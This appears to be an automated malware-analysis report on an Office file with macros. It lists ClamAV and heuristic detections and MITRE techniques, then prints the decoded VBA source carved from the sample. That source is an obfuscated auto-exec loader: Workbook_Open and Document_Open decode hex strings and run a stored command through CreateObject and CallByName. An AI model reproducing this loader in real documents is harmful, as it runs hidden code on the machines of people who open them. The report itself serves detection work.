MALICIOUS
344
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The file contains heavily obfuscated VBA macros, including an auto-exec loader within the Workbook_Open subroutine. The script utilizes CreateObject and CallByName to execute a payload, likely downloaded or staged elsewhere. The obfuscation and use of auto-execution routines are strong indicators of malicious intent, aiming to run arbitrary code.
Heuristics 10
-
ClamAV: Xls.Malware.Valyria-6700357-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Malware.Valyria-6700357-0
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
CallByName call high OLE_VBA_CALLBYNAMECallByName call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3410 bytes |
SHA-256: 7f428a745a68192fcfe5ff1d21255087cc16f651e698caa665c5766b974bb317 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 4 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Private Function acAE75A3() As String
Dim aacAE75A3 As String
aacAE75A3 = "95BA8F7A9BC28F8F8F678B58B08F8F8F78CC958F968F8FCF988F525F556C8F8F8F8F8F8FAC6EC58E5ABD886D8FAA7A605D93C38F8F8F8F6D8F528F8F8F91AF768F8F8F8F8FAE8F8BA38FB1B1B98F8F8F8FB28F6E8F848F9FA9C08F8F8E8F8F8F8F8FC88999C7657A7D8FA68F998F94628F8F8F8FCE588FCC8FC3C28F958F8F8F8F8F8F8FAEA5B19C8F8F528F50568F7BC88FBA8F668F8F8F8F8F8F55778F818F578F518F8F8F748F8F8F678F8EBD8F8F8F578F8FC9B48FB28F8FAC748F8B7C8FB18F8F8F6596928FC78F6CAC8FB89AB56879858F916A8FA0619B78BE8FA88FC3955C5481588F9B8F8F8F968F5662C0618F8F8F56A7"
acAE75A3 = aacAE75A3
End Function
Sub Workbook_Open()
Application.Run "ThisWorkbook." & L_HVP("97A2A89E")
End Sub
Public Sub GZ_B()
Dim PXB_OTA As Object: Set PXB_OTA = VBA.CreateObject(L_HVP("A09CACBBB2B9BD779CB1AEB5B5"))
CallByName PXB_OTA, "Run", VbMethod, L_HVP(ActiveDocument.Variables("K01VU").Value), 0, True
End Sub
Private Function acE7K0VT() As String
Dim aacE7K0VT As String
aacE7K0VT = "95BA8F7A9BC28F8F8F678B58B08F8F8F78CC958F968F8FCF988F525F556C8F8F8F8F8F8FAC6EC58E5ABD886D8FAA7A605D93C38F8F8F8F6D8F528F8F8F91AF768F8F8F8F8FAE8F8BA38FB1B1B98F8F8F8FB28F6E8F848F9FA9C08F8F8E8F8F8F8F8FC88999C7657A7D8FA68F998F94628F8F8F8FCE588FCC8FC3C28F958F8F8F8F8F8F8FAEA5B19C8F8F528F50568F7BC88FBA8F668F8F8F8F8F8F55778F818F578F518F8F8F748F8F8F678F8EBD8F8F8F578F8FC9B48FB28F8FAC748F8B7C8FB18F8F8F6596928FC78F6CAC8FB89AB56879858F916A8FA0619B78BE8FA88FC3955C5481588F9B8F8F8F968F5662C0618F8F8F56A7"
acE7K0VT = aacE7K0VT
End Function
Public Sub Document_Open()
Application.Run L_HVP("97A2A89E")
End Sub
Public Function L_HVP(ByVal PXB_OTA As String)
Dim BVT_I As String
Dim WI_D As Long
For WI_D = 1 To Len(PXB_OTA) Step 2
BVT_I = BVT_I & Chr(CLng(Chr(38) & Chr(72) & Mid(PXB_OTA, WI_D, 2)) - 73)
Next
L_HVP = BVT_I
End Function
Private Function acJAPYU8() As String
Dim aacJAPYU8 As String
aacJAPYU8 = "95BA8F7A9BC28F8F8F678B58B08F8F8F78CC958F968F8FCF988F525F556C8F8F8F8F8F8FAC6EC58E5ABD886D8FAA7A605D93C38F8F8F8F6D8F528F8F8F91AF768F8F8F8F8FAE8F8BA38FB1B1B98F8F8F8FB28F6E8F848F9FA9C08F8F8E8F8F8F8F8FC88999C7657A7D8FA68F998F94628F8F8F8FCE588FCC8FC3C28F958F8F8F8F8F8F8FAEA5B19C8F8F528F50568F7BC88FBA8F668F8F8F8F8F8F55778F818F578F518F8F8F748F8F8F678F8EBD8F8F8F578F8FC9B48FB28F8FAC748F8B7C8FB18F8F8F6596928FC78F6CAC8FB89AB56879858F916A8FA0619B78BE8FA88FC3955C5481588F9B8F8F8F968F5662C0618F8F8F56A7"
acJAPYU8 = aacJAPYU8
End Function
Sub NY_U()
GZ_B
End Sub
Private Function acP6ARG7() As String
Dim aacP6ARG7 As String
aacP6ARG7 = "95BA8F7A9BC28F8F8F678B58B08F8F8F78CC958F968F8FCF988F525F556C8F8F8F8F8F8FAC6EC58E5ABD886D8FAA7A605D93C38F8F8F8F6D8F528F8F8F91AF768F8F8F8F8FAE8F8BA38FB1B1B98F8F8F8FB28F6E8F848F9FA9C08F8F8E8F8F8F8F8FC88999C7657A7D8FA68F998F94628F8F8F8FCE588FCC8FC3C28F958F8F8F8F8F8F8FAEA5B19C8F8F528F50568F7BC88FBA8F668F8F8F8F8F8F55778F818F578F518F8F8F748F8F8F678F8EBD8F8F8F578F8FC9B48FB28F8FAC748F8B7C8FB18F8F8F6596928FC78F6CAC8FB89AB56879858F916A8FA0619B78BE8FA88FC3955C5481588F9B8F8F8F968F5662C0618F8F8F56A7"
acP6ARG7 = aacP6ARG7
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.